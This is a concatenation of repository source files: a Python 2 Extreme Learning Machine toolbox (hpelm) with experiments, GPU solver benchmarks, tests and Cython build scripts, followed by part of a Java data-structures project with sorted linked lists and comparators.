Xtr = np.load(os.path.join(folder, "xtrain_%d.npy" % (i + 1)))
Xts = np.load(os.path.join(folder, "xtest_%d.npy" % (i + 1)))
Ytr = np.load(os.path.join(folder, "ytrain_%d.npy" % (i + 1)))
Yts = np.load(os.path.join(folder, "ytest_%d.npy" % (i + 1)))
# train ELM
Xtr = Xtr[:,2:]
Xts = Xts[:,2:]
Ytr = np.hstack((Ytr[:,:2], Ytr[:,3][:,None]))
Yts = np.hstack((Yts[:,:2], Yts[:,3][:,None]))
e = elm()
e.train(Xtr, Ytr, nn)
Yh = e.run(Xts)
# evaluate classification results
Yts = np.argmax(Yts, 1)
Yh = np.argmax(Yh, 1)
acc[i] = float(np.sum(Yh == Yts)) / Yts.shape[0]
return acc
def code_show(nn, i):
folder = 'Classification-Iris'
folder = os.path.join(os.path.dirname(__file__), "../datasets", folder)
acc = np.zeros((10,))
# get file names
Xtr = np.load(os.path.join(folder, "xtrain_%d.npy" % (i + 1)))
Xts = np.load(os.path.join(folder, "xtest_%d.npy" % (i + 1)))
Ytr = np.load(os.path.join(folder, "ytrain_%d.npy" % (i + 1)))
Yts = np.load(os.path.join(folder, "ytest_%d.npy" % (i + 1)))
# train ELM
#Xtr = Xtr[:,2:]
#Xts = Xts[:,2:]
i1 = 0
i2 = 3
Xtr = np.vstack((Xtr[:,i1], Xtr[:,i2])).T
Xts = np.vstack((Xts[:,i1], Xts[:,i2])).T
Ytr = np.hstack((Ytr[:,:2], Ytr[:,3][:,None]))
Yts = np.hstack((Yts[:,:2], Yts[:,3][:,None]))
#print '1'
#print Xtr[Ytr[:,0]==1].std(axis=0)**2
#print Xtr[Ytr[:,1]==1].std(axis=0)**2
# prepare mesh grid
x = np.arange(-2.5, 2.5, 0.1)
y = np.arange(-2.5, 2.5, 0.1)
n = x.shape[0]
xm, ym = np.meshgrid(x, y)
D = np.vstack((xm.ravel(), ym.ravel())).T
# reduce number of samples of one class
N2 = 2
idx = np.where(Ytr[:,1]==1)[0]
np.random.shuffle(idx)
idx = idx[:N2]
idx = np.array([21, 76])
print idx
# average over many runs
Z = []
acc = []
for _ in range(1):
e = elm()
Xres = e.train(Xtr, Ytr, nn, idx)
# evaluate classification results
Yh = e.run(Xts)
Yts1 = np.argmax(Yts, 1)
Yh1 = np.argmax(Yh, 1)
acc.append(float(np.sum(Yh1 == Yts1)) / Yts1.shape[0])
# show plot
Z.append(e.run(D))
Z = np.array(Z).mean(0)
print "acc:", np.mean(acc)
I = Z.copy()
Z[Z<0] = 0
I[I<0] = 0
I = I.reshape(n,n,3)
I = I / I.max(axis=2)[:,:,None]
I = I[::-1, :, :]
plt.imshow(I, extent=[-2.5, 2.5, -2.5, 2.5])
#cl = 1
#plt.contour(xm, ym, Z[:,cl].reshape(n,n), colors='k')
#plt.contourf(xm, ym, Z[:,cl].reshape(n,n), cmap=plt.cm.bone)
#plt.scatter(D[:,0], D[:,1], s=Z[:,0])
#Xa = np.vstack((Xtr, Xts))
#Ya = np.vstack((Ytr, Yts))
#plt.scatter(Xa[:,0], Xa[:,1], c=Ya)
#plt.scatter(Xtr[:,0], Xtr[:,1], c=Ytr)
plt.scatter(Xtr[Ytr[:,0]==1,0], Xtr[Ytr[:,0]==1,1], c=Ytr[Ytr[:,0]==1])
plt.scatter(Xtr[idx,0], Xtr[idx,1], c=Ytr[idx])
plt.scatter(Xres[:,0], Xres[:,1], c=Ytr[idx[0]])
plt.scatter(Xtr[Ytr[:,2]==1,0], Xtr[Ytr[:,2]==1,1], c=Ytr[Ytr[:,2]==1])
plt.show()
if __name__ == "__main__":
nn = 7
#m = []
#for _ in range(100):
# acc = code(nn)
# m.append(np.mean(acc))
#m = np.array(m)*100
#print "%.1f+-%.1f" % (np.mean(m), np.std(m))
code_show(nn, 0)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 14:27:13 2015
@author: akusok
"""
from gpu_solver import GPUSolver, gpu_solve
import numpy as np
from scipy.linalg import solve
import sys
from time import time
def s_cpu(data, n, nrhs):
XX = np.zeros((n, n))
XT = np.zeros((n, nrhs))
for X, T in data:
t = time()
XX += X.T.dot(X)
XT += X.T.dot(T)
print "CPU: added batch in %.2fs" % (time()-t)
t = time()
Beta = solve(XX, XT, sym_pos=True)
print "CPU: solution in %.2fs" % (time()-t)
return Beta
def s_gpu(data, n, nrhs):
s = GPUSolver(n, nrhs)
for X, T in data:
t = time()
s.add_data(X, T)
print "GPU: added batch in %.2fs" % (time()-t)
t = time()
B = s.solve()
print "GPU: solution in %.2fs" % (time()-t)
return B
def test():
n = int(sys.argv[1])
nrhs = int(sys.argv[2])
k = int(sys.argv[3])
data = []
for _ in range(k):
n1 = int(n*0.7)
X = np.random.rand(n1, n).astype(np.float64)
T = np.random.rand(n1, nrhs).astype(np.float64)
data.append((X, T))
B = s_gpu(data, n, nrhs)
Beta = s_cpu(data, n, nrhs)
print "Norm of CPU-GPU difference:", np.linalg.norm(B - Beta)
if __name__ == "__main__":
if len(sys.argv) != 4:
print "add arguments: number of neurons, number of targets, number of batches of data"
else:
test()
print "Works!"
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Jan 6 19:05:03 2014
@author: akusoka1
"""
import numpy as np
from time import time
n = 60000
k = 784
d = 10
H = np.random.randn(n,k)
Y = np.random.randn(n,d)
t = time()
W = H.T.dot(H)
t = time() - t
print "runtime: %.2f" % t
print "done"
<file_sep>'''
Created on May 14, 2014
@author: akusoka1
'''
import numpy as np
from time import time
def test_small():
b = 2**28 # 1GB RAM
A = np.random.random_sample((b,)).astype(np.float64)
B = np.random.random_sample((b,)).astype(np.float64)
print A.shape, B.shape
for nn in [1,1,2,4,8,16,32,64,128,256,512,1024]:
N = b/nn
A = A.reshape(nn,N)
B = B.reshape(N,nn)
t = time()
np.dot(A,B)
t = time() - t
print "%.1f GB RAM, %d neurons: %.2f seconds, complex %.1f" % (((nn*N*8.0) / 2**29), nn, t, (1.0*nn*N*nn)/2**28)
def test_large():
b = 2**28 # 1GB RAM
A = np.random.random_sample((b,)).astype(np.float64)
B = np.random.random_sample((b,)).astype(np.float64)
print A.shape, B.shape
for nn in [5000,10000]:
N = b/nn
#A = A.ravel()[:nn*N].reshape(nn,N)
#B = B.ravel()[:nn*N].reshape(N,nn)
C = np.random.rand(nn,nn)
#t = time()
#np.linalg.pinv(C)
#t1 = time() - t
#t = time()
#np.linalg.svd(C)
#t2 = time() - t
t1=0
t2=0
B = np.random.rand(nn,10)
t = time()
Q,R = np.linalg.qr(C)
P = np.dot(Q.T, B)
np.dot(np.linalg.inv(R), P)
t3 = time() - t
print "%.1f GB RAM, %d neurons: inv %.2fs, SVD %.2fs, QR %.2fs" % (((nn*N*8.0) / 2**29), nn, t1, t2, t3)
if __name__ == '__main__':
test_large()<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Feb 21 20:46:31 2015
@author: akusok
"""
from mrsr import mrsr
from mrsr2 import mrsr2
from hdf5_tools import make_hdf5, normalize_hdf5, ireader, iwriter
from rbf_param import rbf_param<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
from slfn import SLFN
class HPELM(SLFN):
"""High performance GPU and parallel Extreme Learning Machine.
"""
# inherited def __init__(self, inputs, outputs):
# inherited def _checkdata(self, X, T):
# inherited def add_neurons(self, number, func, W=None, B=None):
# inherited def project(self, X):
# inherited def predict(self, X):
# inherited def save(self, model):
# inherited def load(self, model):
def __init__(self, X, T, *args, **kvargs):
"""Universal contructor of ELM model with model structure selection.
:param X: input data matrix
:param T: target data matrix
:param Xmean: vector of mean value of X for normalization !!! hpelm
:param Xstd: vector of srd of X for normalization !!! hpelm
Model structure selection (exclusive, choose one)
:param "V": use validation set
:param "CV": use cross-validation
:param "MCCV": use Monte-Carlo cross-validation
:param "LOO": use leave-one-out validation
Additional validation parameters
:param Xv: validation data X ("V")
:param Tv: validation targets T ("V")
:param k: number of splits ("CV", "MCCV")
:param n: number of repetitions ("MCCV")
Ranking of hidden neurons
:param "HQ": use Hannan-Quinn criterion
# no OP-ELM
System setup
:param "classification"/"c": build ELM for classification
:param "multiclass"/"mc": build ELM for multiclass classification
:param "adaptive"/"ad": build adaptive ELM for non-stationary model
:param "batch": batch size for adaptive ELM (sliding window step size)
"""
print X.shape
print T.shape
print "start args"
for arg in args:
print arg
print "start kvargs"
for kv, arg in kvargs.items():
print kv, arg
print "end (kv)args"
N, inputs = X.shape
_, targets = T.shape
super(ELM, self).__init__(inputs, targets)
def train(self, X, T):
"""Learn a model to project inputs X to targets T.
:param X: - matrix of inputs
:param T: - matrix of targets
"""
assert len(self.neurons) > 0, "Add neurons before training ELM"
X, T = self._checkdata(X, T)
H = self.project(X)
self.Beta = np.linalg.pinv(H).dot(T)
''' COPY OF OLD PRUNING METHODS
def prune_op(self, X, T, batch=10000, delimiter=" "):
"""Prune ELM as in OP-ELM paper.
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
rank = mrsr(H, T1, nn)
# select best number of neurons
MSE = press(H[:, rank[:2]], T1, self.classification, self.multiclass)
R_opt = rank[:2]
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
r = rank[:i]
mse1 = press(H[:,r], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = r
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
r = R_opt
# save number of neurons and their ranking information
nfeats.append(len(r))
# first selected neuron gets weight 2, last one gets weight 1
neurons[r] += np.linspace(2,1,num=len(r))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
def prune_op2(self, X, T, norm=1, batch=10000, delimiter=" "):
"""Prune ELM with a more recent implementation of MRSR.
:param norm: - check numpy.linalg.norm(X, <norm>)
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
# this MRSR2 is a class, with <.rank> attribute and <.new_input()> method
M = mrsr2(H, T1, norm)
M.new_input()
M.new_input()
# select best number of neurons
MSE = press(H[:, M.rank], T1, self.classification, self.multiclass)
R_opt = M.rank
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
M.new_input()
mse1 = press(H[:, M.rank], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = M.rank
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
rank = R_opt
del M
# save number of neurons and their ranking information
nfeats.append(len(rank))
# first selected neuron gets weight 2, last one gets weight 1
neurons[rank] += np.linspace(2,1,num=len(rank))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
'''
<file_sep># -*- coding: utf-8 -*-
"""
Created on Tue Apr 7 17:48:46 2015
@author: akusok
"""
import numpy as np
from scipy.spatial.distance import cdist
from multiprocessing import Pool, cpu_count
from time import time, sleep
def f(a):
h, w, ix = a
return cdist(h, w, "sqeuclidean"), ix
# @profile
def run():
H = np.random.rand(2,300)
W = np.random.rand(3000, 300)
t = time()
C1 = cdist(H, W, "sqeuclidean")
print time() - t
print "done 1"
t = time()
k = cpu_count()
N = H.shape[0]
idxs = np.array_split(np.arange(N), k*10)
jobs = [(H[ix], W, ix) for ix in idxs]
p = Pool(k)
C1p = np.empty((N, W.shape[0]))
# for h, w, ix in jobs:
# C1p[ix] = cdist(h, w, "sqeuclidean")
t2 = time()
for h0, ix in p.imap(f, jobs):
C1p[ix] = h0
print time() - t2
p.close()
print time() - t
assert np.allclose(C1, C1p)
# C = cdist(H, W, "cityblock")
# C = cdist(H, W, "chebyshev")
# @profile
def run_all():
c = run()
print "Done"
run_all()
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Nov 21 18:52:32 2014
@author: akusok
"""
import numpy as np
def semi_Tikhonov(H, T, Tmean):
# add semi-Tikhonov regularization: small random noise projected to "zero"
# "zero" = zero + E[T], otherwise we introduce a bias
nT = H.shape[0]/10 + 1
tkH = np.random.rand(nT, H.shape[1]) * 10E-6
tkT = np.tile(Tmean, (nT,1))
H = np.vstack((H, tkH))
T = np.vstack((T, tkT))
return H, T
<file_sep># -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 14:27:13 2015
@author: akusok
"""
from magma_solver import GPUSolver
import numpy as np
import sys
from time import time
@profile
def s_cpu(data, n, nrhs):
XX = np.zeros((n,n))
XT = np.zeros((n,nrhs))
for X,T in data:
t = time()
XX = XX + X.T.dot(X)
XT = XT + X.T.dot(T)
print "added batch in %.2fs" % (time()-t)
t = time()
P = np.linalg.inv(XX)
print "solution in %.2fs" % (time()-t)
Beta = P.dot(XT)
return Beta
@profile
def s_gpu(data, n, nrhs):
s = GPUSolver(n, nrhs)
for X,T in data:
s.add_data(X, T)
B = s.solve()
return B
@profile
def try1():
n = int(sys.argv[1])
nrhs = int(sys.argv[2])
k = int(sys.argv[3])
data = []
for _ in range(k):
n1 = int(n*0.7)
X = np.random.rand(n1,n).astype(np.float64)
T = np.random.rand(n1,nrhs).astype(np.float64)
data.append((X,T))
B = s_gpu(data, n, nrhs)
Beta = s_cpu(data, n, nrhs)
print np.linalg.norm(B - Beta)
try1()
print "Works!"
<file_sep>from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("rect",
sources = ["rect.pyx", "Rectangle.cpp"],
language="c++"
)]
)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Feb 21 20:46:31 2015
@author: akusok
"""
from gpu_solver import GPUSolver, gpu_solve
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Jan 6 19:05:03 2014
@author: akusoka1
"""
import numpy as np
from f_apply import f_apply
n = 100000
k = 2000
H = np.ones((n,k))
f = np.random.randint(0,2,size=(k,)).astype(np.int32)
f_apply(H,f)
print f
print H[0]<file_sep>#include <math.h>
void nl_func(double *H, const int *f, int n, int k);<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
def train_cv(self, X, T, k):
N = X.shape[0]
idxk = []
for i in range(k):
idxk.append(np.arange(N)[i::k])
datak = []
for i in range(k):
items = [(i+j) % k for j in range(k)]
idx_tr = np.hstack([idxk[j] for j in items[:-2]])
idx_vl = idxk[items[-2]]
idx_ts = idxk[items[-1]]
Xtr = X[idx_tr]
Ttr = T[idx_tr]
Xvl = X[idx_vl]
Tvl = T[idx_vl]
Xts = X[idx_ts]
Tts = T[idx_ts]
HH, HT = self._project(Xtr, Ttr)
Hvl = self.project(Xvl)
Hts = self.project(Xts)
rank, nn = self._ranking(Hvl.shape[1], Hvl, Tvl)
datak.append((HH, HT, Hvl, Tvl, Hts, Tts, rank))
e = np.ones((nn+1,)) * -1 # errors for all numbers of neurons
err = 0
for HH, HT, Hvl, Tvl, _, _, _ in datak:
Beta = self._solve_corr(HH, HT)
Yvl = np.dot(Hvl, Beta)
err += self._error(Yvl, Tvl) / k
penalty = err * 0.01 / nn # penalty is 1% of error at max(nn)
e[nn] = err + nn * penalty
# MYOPT function
# [A B C D E] interval points,
# halve the interval each time
# initialize intervals
A = 3
E = nn
l = E - A
B = A + l/4
C = A + l/2
D = A + 3*l/4
l = 1000 # run the while loop at least once
while l > 2:
# calculate errors at points
for idx in [A, B, C, D, E]:
if e[idx] == -1: # skip already calculated errors
err = 0
for HH, HT, Hvl, Tvl, _, _, rank in datak:
rank1 = rank[:idx]
HH1 = HH[rank1, :][:, rank1]
HT1 = HT[rank1, :]
Beta = self._solve_corr(HH1, HT1)
Yvl = np.dot(Hvl[:, rank1], Beta)
err += self._error(Yvl, Tvl) / k
e[idx] = err + idx * penalty
m = min(e[A], e[B], e[C], e[D], e[E]) # find minimum element
# halve the search interval
if m in (e[A], e[B]):
E = C
C = B
elif m in (e[D], e[E]):
A = C
C = D
else:
A = B
E = D
l = E - A
B = A + l/4
D = A + (3*l)/4
k_opt = [n1 for n1 in [A, B, C, D, E] if e[n1] == m][0] # find minimum index
best_nn = rank[:k_opt]
# get test error
err_ts = 0
for HH, HT, _, _, Hts, Tts, _ in datak:
Beta = self._solve_corr(HH, HT)
Yts = np.dot(Hts, Beta)
err_ts += self._error(Yts, Tts) / k
self._prune(best_nn)
self.Beta = self._project(X, T, solve=True)[2]
# print "%d of %d neurons selected with a Cross-Validation" % (len(best_nn), nn)
# print "the Cross-Validation test error is %f" % err_ts
# if len(best_nn) > nn*0.9:
# print "Hint: try re-training with more hidden neurons"
return err_ts
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 14:12:41 2014
@author: akusok
"""
from unittest import TestCase
import numpy as np
from hpelm import ELM
class TestCorrectness(TestCase):
def test_1_NonNumpyInputs_RaiseError(self):
X = np.array([['1', '2'], ['3', '4'], ['5', '6']])
T = np.array([[1], [2], [3]])
elm = ELM(2, 1)
elm.add_neurons(1, "lin")
self.assertRaises(AssertionError, elm.train, X, T)
def test_2_NonNumpyTargets_RaiseError(self):
X = np.array([[1, 2], [3, 4], [5, 6]])
T = np.array([['a'], ['b'], ['c']])
elm = ELM(2, 1)
elm.add_neurons(1, "lin")
self.assertRaises(AssertionError, elm.train, X, T)
def test_3_OneDimensionInputs_RunsCorrectly(self):
X = np.array([1, 2, 3])
T = np.array([[1], [2], [3]])
elm = ELM(1, 1)
elm.add_neurons(1, "lin")
elm.train(X, T)
def test_4_OneDimensionTargets_RunsCorrectly(self):
X = np.array([1, 2, 3])
T = np.array([1, 2, 3])
elm = ELM(1, 1)
elm.add_neurons(1, "lin")
elm.train(X, T)
def test_5_WrongDimensionalityInputs_RaiseError(self):
X = np.array([[1, 2], [3, 4], [5, 6]])
T = np.array([[1], [2], [3]])
elm = ELM(1, 1)
elm.add_neurons(1, "lin")
self.assertRaises(AssertionError, elm.train, X, T)
def test_6_WrongDimensionalityTargets_RaiseError(self):
X = np.array([[1, 2], [3, 4], [5, 6]])
T = np.array([[1], [2], [3]])
elm = ELM(1, 2)
elm.add_neurons(1, "lin")
self.assertRaises(AssertionError, elm.train, X, T)
def test_7_ZeroInputs_RunsCorrectly(self):
X = np.array([[0, 0], [0, 0], [0, 0]])
T = np.array([1, 2, 3])
elm = ELM(2, 1)
elm.add_neurons(1, "lin")
elm.train(X, T)
def test_8_OneDimensionTargets_RunsCorrectly(self):
X = np.array([[1, 2], [3, 4], [5, 6]])
T = np.array([[0], [0], [0]])
elm = ELM(2, 1)
elm.add_neurons(1, "lin")
elm.train(X, T)
def test_9_TrainWithoutNeurons_RaiseError(self):
X = np.array([1, 2, 3])
T = np.array([1, 2, 3])
elm = ELM(1, 1)
self.assertRaises(AssertionError, elm.train, X, T)
def test_10_DifferentNumberOfSamples_RaiseError(self):
X = np.array([[1, 2], [3, 4], [5, 6]])
T = np.array([[1], [2]])
elm = ELM(2, 1)
self.assertRaises(AssertionError, elm.train, X, T)
def test_11_LinearNeurons_MoreThanInputs_Truncated(self):
elm = ELM(2, 1)
elm.add_neurons(3, "lin")
self.assertEqual(2, elm.neurons[0][1])
def test_12_LinearNeurons_DefaultMatrix_Identity(self):
elm = ELM(4, 1)
elm.add_neurons(3, "lin")
np.testing.assert_array_almost_equal(np.eye(4, 3), elm.neurons[0][2])
def test_13_SLFN_AddLinearNeurons_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "lin")
self.assertEquals("lin", elm.neurons[0][0])
def test_14_SLFN_AddSigmoidalNeurons_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "sigm")
self.assertEquals("sigm", elm.neurons[0][0])
def test_15_SLFN_AddTanhNeurons_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "tanh")
self.assertEquals("tanh", elm.neurons[0][0])
def test_16_SLFN_AddRbfL1Neurons_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "rbf_l1")
self.assertEquals("rbf_l1", elm.neurons[0][0])
def test_17_SLFN_AddRbfL2Neurons_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "rbf_l2")
self.assertEquals("rbf_l2", elm.neurons[0][0])
def test_18_SLFN_AddRbfLinfNeurons_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "rbf_linf")
self.assertEquals("rbf_linf", elm.neurons[0][0])
def test_19_SLFN_AddUfuncNeurons_GotThem(self):
elm = ELM(1, 1)
func = np.frompyfunc(lambda a: a+1, 1, 1)
elm.add_neurons(1, func)
self.assertIs(func, elm.neurons[0][0])
def test_20_SLFN_AddTwoNeuronTypes_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "lin")
elm.add_neurons(1, "sigm")
self.assertEquals(2, len(elm.neurons))
ntypes = [nr[0] for nr in elm.neurons]
self.assertIn("lin", ntypes)
self.assertIn("sigm", ntypes)
def test_21_SLFN_AddNeuronsTwice_GotThem(self):
elm = ELM(1, 1)
elm.add_neurons(1, "lin")
elm.add_neurons(1, "lin")
self.assertEquals(1, len(elm.neurons))
self.assertEquals(2, elm.neurons[0][1])
def test_22_AddNeurons_InitBias_BiasInModel(self):
elm = ELM(1, 1)
bias = np.array([1, 2, 3])
elm.add_neurons(3, "sigm", None, bias)
np.testing.assert_array_almost_equal(bias, elm.neurons[0][3])
def test_23_AddNeurons_InitW_WInModel(self):
elm = ELM(2, 1)
W = np.array([[1, 2, 3], [4, 5, 6]])
elm.add_neurons(3, "sigm", W, None)
np.testing.assert_array_almost_equal(W, elm.neurons[0][2])
def test_24_AddNeurons_InitDefault_BiasWNotZero(self):
elm = ELM(2, 1)
elm.add_neurons(3, "sigm")
W = elm.neurons[0][2]
bias = elm.neurons[0][3]
self.assertGreater(np.sum(np.abs(W)), 0.001)
self.assertGreater(np.sum(np.abs(bias)), 0.001)
def test_25_AddNeurons_InitTwiceBiasW_CorrectlyMerged(self):
elm = ELM(2, 1)
W1 = np.random.rand(2, 3)
W2 = np.random.rand(2, 4)
bias1 = np.random.rand(3,)
bias2 = np.random.rand(4,)
elm.add_neurons(3, "sigm", W1, bias1)
elm.add_neurons(4, "sigm", W2, bias2)
np.testing.assert_array_almost_equal(np.hstack((W1, W2)), elm.neurons[0][2])
np.testing.assert_array_almost_equal(np.hstack((bias1, bias2)), elm.neurons[0][3])
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Oct 30 20:50:54 2014
@author: akusok
"""
import numpy as np
import time
@profile
def line_count(filename):
start_time = time.time()
f = open(filename)
lines = 0
buf_size = 1024 * 1024
read_f = f.read # loop optimization
buf = read_f(buf_size)
while buf:
lines += buf.count('\n')
buf = read_f(buf_size)
print lines, time.time() - start_time
@profile
def run():
#x =np.random.randn(100000000,5)
x = np.random.randn(10000000,5)
b = 3952
n = x.shape[0]
E_x = 0
E_x2 = 0
for i in range(n/b + 1):
k = min(b, n-i*b)
xb = x[i*b:i*b+k]
E_x += np.mean(xb,0) * (1.0*k/n)
E_x2 += np.mean(xb**2,0) * (1.0*k/n)
E2_x = E_x**2
sh = (E_x2 - E2_x)**0.5
s = np.std(x,0)
print sh
print s
#run()
bufcount("/home/akusok/Documents/X-ELM/hpelm/datasets/regression_song_year/Xtr.txt")
<file_sep>#!/usr/bin/env python
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy
ext_module = Extension(
"f_apply",
["f_apply.pyx", "mp_func.c"],
include_dirs=[numpy.get_include()],
extra_compile_args=['-fopenmp'],
extra_link_args=['-fopenmp'],
)
setup(
name = 'f_apply',
cmdclass = {'build_ext': build_ext},
ext_modules = [ext_module],
)
<file_sep>High Performance ELM
--------
Extreme Learning Machine (ELM) with model selection and regularizations.
In-memory ELM works, check hpelm/tests folder.
MAGMA acceleration works, check hpelm/acc/setup_gpu.py.
Example usage::
>>> from hpelm import ELM
>>> elm = ELM(X.shape[1], T.shape[1])
>>> elm.add_neurons(20, "sigm")
>>> elm.add_neurons(10, "rbf_l2")
>>> elm.train(X, T, "LOO")
>>> Y = elm.predict(X)
If you use the toolbox, cite our paper "High Performance Extreme Learning Machines: A Complete Toolbox for Big Data Applications" that will be published in IEEE Access.
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Oct 18 17:21:12 2014
@author: akusok
"""
from setuptools import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import commands
import numpy
import sys
def pkgconfig(*packages, **kw):
"""Returns nicely organized stuff from PKGCONFIG.
Found on the internet, returns a dictionary with
libraries, library dirs, include dirs, extra arguments
To test, run in terminal: "pkg-config --libs --cflags magma"
To add "magma" to pkg-config:
export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/magma/lib/pkgconfig
use your own path to installed magma + lib/pkgconfig
"""
flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
for token in commands.getoutput("pkg-config --libs --cflags %s" % ' '.join(packages)).split():
if token[:2] in flag_map:
kw.setdefault(flag_map.get(token[:2]), []).append(token[2:])
else:
kw.setdefault('extra_compile_args', []).append(token)
return kw
setup(cmdclass={'build_ext': build_ext},
ext_modules=[
Extension(
"gpu_solver",
sources=["gpu_solver.pyx",
"gpu_code.cpp"],
language="c++",
extra_compile_args=pkgconfig("magma")["extra_compile_args"],
include_dirs=[numpy.get_include()] + pkgconfig("magma")["include_dirs"],
libraries=pkgconfig("magma")["libraries"],
library_dirs=pkgconfig("magma")["library_dirs"])
]
)
| e8ef3a7042f54a0827a835bc06dc6fbe073753f3 | [
"reStructuredText",
"Python",
"C",
"C++",
"Shell"
] | 57 | Shell | YuanhaoGong/hpelm | 74a20302fe22588ab1b7b02cb761c5405cdff5f3 | 0abc3c5585461f3a688089a6589038f1a5bed2a1 |
refs/heads/master | <file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortedLinkedList;
import org.dongtech.datastructures.list.SortedListInterface;
/**
* @author Fuqiang
* Created on 24/02/2018.
*/
public class SortedLinkedListTest extends BaseTest {
public static void main(String[] args) {
SortedListInterface<String> strings = new SortedLinkedList<>();
strings.add("Jamie");
strings.add("Brenda");
strings.add("Sarah");
strings.add("Tom");
strings.add("Carlos");
log(strings.toString());
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.*;
import org.dongtech.datastructures.list.SortArray;
import java.util.Arrays;
/**
* @author Fuqiang
* Created on 22/02/2018.
*/
public class SortByComparatorTest {
public static void main(String[] args) {
int i = 5;
Student[] students = new Student[i];
for (int j = 0; j < i; j++) {
Student s = new Student("s" + j, (int) (Math.random() * 10), "00" + (int) (Math.random() * 100), Math.random
() * 100);
students[j] = s;
}
SortArray.sort(students, new NameComparator());
System.out.println(Arrays.toString(students));
SortArray.sort(students, new GradeComparator());
System.out.println(Arrays.toString(students));
SortArray.sort(students, new CodeComparator());
System.out.println(Arrays.toString(students));
SortArray.sort(students, new ScoreComparator());
System.out.println(Arrays.toString(students));
}
}
<file_sep>package org.dongtech.javacore.multithreads;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.*;
/**
* @author Fuqiang
* Created on 2018/5/12.
*/
class SearchTaskTest {
@Test
void search() {
}
@Test
void run() {
}
}<file_sep>package org.dongtech.datastructures.list;
import java.io.Serializable;
/**
* @author Fuqiang
* Created on 28/02/2018.
*/
public abstract class LinkedChainBase<T> implements Serializable {
private Node firstNode;
private int length;
public LinkedChainBase() {
clear();
}
public void clear() {
}
public int getLength() {
return length;
}
public boolean isEmpty() {
return false;
}
public boolean isFull() {
return false;
}
public void display() {
}
protected final Node getNodeAt(int position) {
return null;
}
protected final void addFirstNode(Node newNode) {
assert newNode != null : "null argument in addFirstNode";
newNode.setNext(firstNode);
firstNode = newNode;
length++;
}
protected final void addAfterNode(Node nodeBefore, Node newNode) {
newNode.setNext(nodeBefore.getNext());
nodeBefore.setNext(newNode);
}
protected final T removeFirstNode() {
Node nodeToRemove = firstNode;
firstNode = nodeToRemove.getNext();
return nodeToRemove.getData();
}
protected final T removeAfterNode(Node nodeBefore) {
Node currentNode = nodeBefore.getNext();
if (null != currentNode) {
nodeBefore.setNext(currentNode.getNext());
return currentNode.getData();
}
return null;
}
protected final Node getFirstNode() {
return firstNode;
}
protected class Node implements Serializable {
private T data;
private Node next;
protected Node(T data) {
this.data = data;
}
private Node(T dataPortion, Node nextNode) {
data = dataPortion;
next = nextNode;
}
protected T getData() {
return data;
}
private void setData(T data) {
this.data = data;
}
